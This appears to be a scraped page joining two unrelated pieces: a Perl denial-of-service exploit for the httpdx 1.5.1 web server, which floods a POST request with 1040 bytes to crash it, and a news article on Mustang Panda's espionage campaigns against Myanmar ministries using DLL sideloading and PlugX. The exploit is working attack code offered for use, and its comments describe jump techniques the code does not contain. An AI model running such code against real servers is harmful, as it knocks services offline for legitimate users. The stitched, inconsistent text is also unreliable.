#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The web server does not correctly handle the amount of data or bytes sent.  
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

   my $sock = IO::Socket::INET->new("$ip:$port");

   my $exploit = "\x41"x1040;

   print $sock "POST /index2.html HTTP/1.0\r\n" .   
    "Content-Length: 1023\r\n" .   
    "Content-Type: html\r\n" .   
    "Host: $ip" . "\r\n" .  
    "\r\n" .  
    $exploit;

                print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

      ---------- # ------------------------------------------------------------------  
      --------- ##= -------------- [+] httpdx 1.5.1 - Denial of Service (DoS) -------  
      -------- ##=== ----------------------------------------------------------------  
      ------ ###==#=== --------------------------------------------------------------  
      ---- ####===##==== ------------------------------------------------------------  
      -- #####====###===== -----          Coded by Fernando Mengali             -----  
      - #####=====####===== -----        fernando.mengalli@gmail.com            -----  
      - #####=====####===== ---------------------------------------------------------  
      --- ####=  #  #==== --------    Prepare to exploiting the server   ------------  
      --------- ##= -----------------------------------------------------------------  
      ------- ####=== ---------------------------------------------------------------

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

httpdx 1.5.1 Denial Of Service

The China-based threat actor known as Mustang Panda is suspected to have targeted Myanmar's Ministry of Defence and Foreign Affairs as part of twin campaigns designed to deploy backdoors and remote access trojans.
The findings come from CSIRT-CTI, which said the activities took place in November 2023 and January 2024 after artifacts in connection with the attacks were uploaded to the

Malware / Cyber Espionage

The China-based threat actor known as **Mustang Panda** is suspected to have targeted Myanmar's Ministry of Defence and Foreign Affairs as part of twin campaigns designed to deploy backdoors and remote access trojans.

The findings come from CSIRT-CTI, which said the activities took place in November 2023 and January 2024 after artifacts in connection with the attacks were uploaded to the VirusTotal platform.

"The most prominent of these TTPs are the use of legitimate software including a binary developed by engineering firm Bernecker & Rainer (B&R) and a component of the Windows 10 upgrade assistant to sideload malicious dynamic-link libraries (DLLs)," CSIRT-CTI said.

Mustang Panda, active since at least 2012, is also recognized by the cybersecurity community under the names BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta, Red Lich, Stately Taurus, and TEMP.Hex.

In recent months, the adversary has been attributed to attacks targeting an unnamed Southeast Asian government as well as the Philippines to deliver backdoors capable of harvesting sensitive information.

The November 2023 infection sequence starts with a phishing email bearing a booby-trapped ZIP archive attachment containing a legitimate executable ("Analysis of the third meeting of NDSC.exe") that's originally signed by B&R Industrial Automation GmbH and a DLL file ("BrMod104.dll").

The attack takes advantage of the fact that the binary is susceptible to DLL search order hijacking to side-load the rogue DLL and subsequently establish persistence and contact with a command-and-control (C2) server and retrieve a known backdoor called PUBLOAD, which, in turn, acts as a custom loader to drop the PlugX implant.

"The threat actors attempt to disguise the \[C2\] traffic as Microsoft update traffic by adding the 'Host: www.asia.microsoft.com' and 'User-Agent: Windows-Update-Agent' headers," CSIRT-CTI noted, mirror a May 2023 campaign disclosed by Lab52.

On the other hand, the second campaign observed earlier this month employs an optical disc image ("ASEAN Notes.iso") containing LNK shortcuts to trigger a multi-stage process that uses another bespoke loader called TONESHELL to likely deploy PlugX from a now-inaccessible C2 server.

It's worth noting that a similar attack chain attributed to Mustang Panda was previously unearthed by EclecticIQ in February 2023 in intrusions aimed at government and public sector organizations across Asia and Europe.

"Following the rebel attacks in northern Myanmar \[in October 2023\], China has expressed concern regarding its effect on trade routes and security around the Myanmar-China border," CSIRT-CTI said.

"Stately Taurus operations are known to align with geopolitical interests of the Chinese government, including multiple cyberespionage operations against Myanmar in the past."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows